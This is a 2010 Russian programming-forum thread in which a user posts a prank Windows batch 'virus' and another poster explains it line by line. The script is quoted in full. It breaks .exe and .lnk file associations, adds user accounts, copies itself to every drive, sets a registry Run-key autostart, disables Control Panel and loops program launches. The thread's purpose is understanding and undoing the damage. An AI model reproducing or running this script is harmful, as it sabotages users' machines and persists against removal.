Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Программная инженерия > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 08.09.2010, 17:26   #1
Altera
Старожил
 
Аватар для Altera
 
Регистрация: 29.01.2008
Сообщений: 2,406
По умолчанию Как откатить действия вот такого *.bat файла?

Всем привет!
На днях в аську постучался один тип, спросил то-же что и щас спрашиваю у вас: Как откатить последствия выполнения вот такого скриптика
Цитата:
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:Лок Дмск >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy ""%0"" "%SystemRoot%\system32\Cool.bat " >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat " /f >nul
reg add HKCU\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul
Прикол в том, что этот "вирус" его рук дело, и был каким-то образом запущен на его компе и теперь он не может избавится от последствие его работы. Я то запустил его на виртуалке, ну в общем так то ему и надо, но мне самому интересно что тут собственно происходит.
Altera вне форума Ответить с цитированием
Старый 08.09.2010, 17:36   #2
Alex Cones
Trust no one.
Старожил
 
Аватар для Alex Cones
 
Регистрация: 07.04.2009
Сообщений: 6,526
По умолчанию

Цитата:
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Мышка для левшей
Цитата:
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
Кажись добавление юзверей.
Цитата:
label C:Лок Дмск >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
Смена меток диска,
Цитата:
md 1 >nul
Создание папок на жестком
Цитата:
:x ;
Start mspaint
goto x ;
Бесконечный запуск пеинта и калькулятора
Цитата:
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
Нельзя открыть lnk и exe
Цитата:
del %0 >nul
Уничтожение батника.
Цитата:
copy ""%0"" "%SystemRoot%\system32\Cool.bat " >nul
reg add "HKLM\SOFTWARE\Microsoft\Window s\Cu rrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat " /f >nul
Чистим следы
Цитата:
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
Пишем себя на все устройства
SQUARY PROJECT - НАБОР БЕСПЛАТНЫХ ПРОГРАММ ДЛЯ РАБОЧЕГО СТОЛА.
МОЙ БЛОГ
GRAY FUR FRAMEWORK - УДОБНАЯ И БЫСТРАЯ РАЗРАБОТКА WINAPI ПРИЛОЖЕНИЙ

Последний раз редактировалось Alex Cones; 08.09.2010 в 17:38.
Alex Cones вне форума Ответить с цитированием
Старый 08.09.2010, 17:57   #3
Altera
Старожил
 
Аватар для Altera
 
Регистрация: 29.01.2008
Сообщений: 2,406
По умолчанию

Вот зараза.
Цитата:
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
Это все *.exe и *.lnk будут открываться в блокноте?
Altera вне форума Ответить с цитированием
Старый 08.09.2010, 18:11   #4
Alex Cones
Trust no one.
Старожил
 
Аватар для Alex Cones
 
Регистрация: 07.04.2009
Сообщений: 6,526
По умолчанию

Будут открываться тем, что открывает txt. Где-то здесь на форуме валялась лечилка такого дела.
SQUARY PROJECT - НАБОР БЕСПЛАТНЫХ ПРОГРАММ ДЛЯ РАБОЧЕГО СТОЛА.
МОЙ БЛОГ
GRAY FUR FRAMEWORK - УДОБНАЯ И БЫСТРАЯ РАЗРАБОТКА WINAPI ПРИЛОЖЕНИЙ
Alex Cones вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проверка на наличие файла и последующие действия. D_A_akella Общие вопросы Delphi 3 20.04.2010 16:44
Создание файла если такого файла нету Shaitan63 Помощь студентам 14 10.04.2010 20:39
Шифрование ссылок и если решение на php вот такого скрипта kaviga PHP 10 10.01.2010 23:39
Отсортировать матрицу вот такого вида! defol-2009 Общие вопросы C/C++ 2 22.07.2009 13:23